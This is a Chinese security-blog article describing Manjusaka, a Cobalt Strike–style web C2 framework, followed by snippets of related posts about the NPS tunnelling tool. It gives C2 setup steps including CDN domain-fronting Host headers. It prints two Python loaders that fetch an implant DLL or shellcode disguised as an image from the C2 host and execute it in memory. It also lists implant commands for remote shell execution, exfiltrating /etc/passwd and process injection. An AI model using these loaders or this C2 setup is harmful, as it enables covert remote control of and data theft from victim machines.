一款基于Web仿CobaltStrike C2远控

VSole2023-09-01 09:22:31

工具介绍

manjusaka牛屎花是一款基于WEB界面的远程主机管理工具,系统架构见下图。

使用方法

配置conf.toml 运行主文件

[root@devops nps]# ./manjusaka[NPS] 2022/09/14 15:57:21 初始用户: manjusaka  密码: ZbFCa2L2LRd5[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka[NPS] 2022/09/14 15:57:21 NPC监听地址 :801[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png

账号密码见初始日志,每个人生成的密码及默认路由都不一样,可编辑nps.db文件自行修改。

1、创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。

新建项目 配置需要填写以下项:

项目名称: 随便写,如:hvv2022回调地址: 外网IP和端口:http://12.34.56.78:8080上线域名: cdn域名,如:http://imagecdn2.alicdn.com 如果没有上cdn则填写和回调地址一样Host头 : cdn上线时所需要的host请求头,如:update.baiduimage.com 默认为上线域名代理地址: NPC上线时如果需要走代理,在这里配置。比如我测试用的clash,代理配置为http://192.168.93.1:7890 详见:https://docs.rs/reqwest/0.11.16/reqwest/struct.Proxy.html

其它都会默认生成,点击确定更新之后需要刷新列表重新启用项目状态。

2、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc母体dll

import requestsfrom ctypes import cdllres = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg")with open("a.dll","wb") as f:    f.write(res.content)cdll.LoadLibrary("a.dll").main()

或者使用shellcode内存加载的形式

import requestsimport ctypesshellcode = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg").contentrwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

3、npc上线,点选中该npc即可对其进行操作, 输入help可查看帮助。目前支持的操作命令如下:

help      打印帮助 ps        查看进程 eg: psss        查看网络连接 eg: ssls        枚举文件 eg: ls /cd        切换目录 eg: cd / sh        执行系统命令  eg: sh ps -aux  , sh tasklist  cat       读取文本 cat a.txtscreen    执行截屏 screenwget      下载文件 eg: wget http://192.168.1.1/a.txt <a.txt>    文件名可选 默认当前  put       上传文件 eg: put /etc/passwd                          将passwd文件上传到nps服务器  start     执行插件可执行文件 eg: start name <args>               需要可执行文件在plugins目录下 会自动把插件传到目标机器上面pl        执行插件 eg: pl plugname <plugargs>                   需要插件在plugins目录下 inject    注入进程 eg: inject pid <shellcodeurl>                shellcodeurl可选 默认下载当前shellcode下载链接

nps
本作品采用《CC 协议》,转载必须注明作者和本文链接
在红队HW中通过前期的打点获得shell后通常下一步就是对内网进行横向,获得shell进想要行横向的前提是我们必须有代理可以访问内网中的资产,这时候我们就需要通过拿到shell的那台机器权限,在此台机上传代理工具进行配置搭建内网代理,目的达到内网出网的效果,使我们能够进行下一步的内网横向渗透。在hw中经常用到的代理工具有很多,根据不同之需和个人不同的使用习惯选择不同工具进行使用,本文主要对NPS
NPS工具是一款使用go语言编写的轻量级、功能强大的内网穿透工具。
nps是一款轻量级、高性能、功能强大的内网穿透反向代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
国家安全局 NPSA将在安全部门MI5之外运作,并吸收和扩大国家基础设施保护中心的职责 - 承认国家和恐怖主义威胁不仅针对关键基础设施提供商。
蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用最近做攻防演练发现了很多内网穿透的工具,其中最多的就是nps,红队老哥好像还挺喜欢这个的,真的是多,每天导出攻击IP,浅浅扫一下端口,基本都能发现这个npsNPS存在一个身份验证的缺陷,无需登录,直接进后台,后台功能点全都可以用。
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
manjusaka牛屎花是一款基于WEB界面的远程主机管理工具,系统架构见下图。
0x00 前言本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。0x01 nps-npc1.1 简介nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
VSole
网络安全专家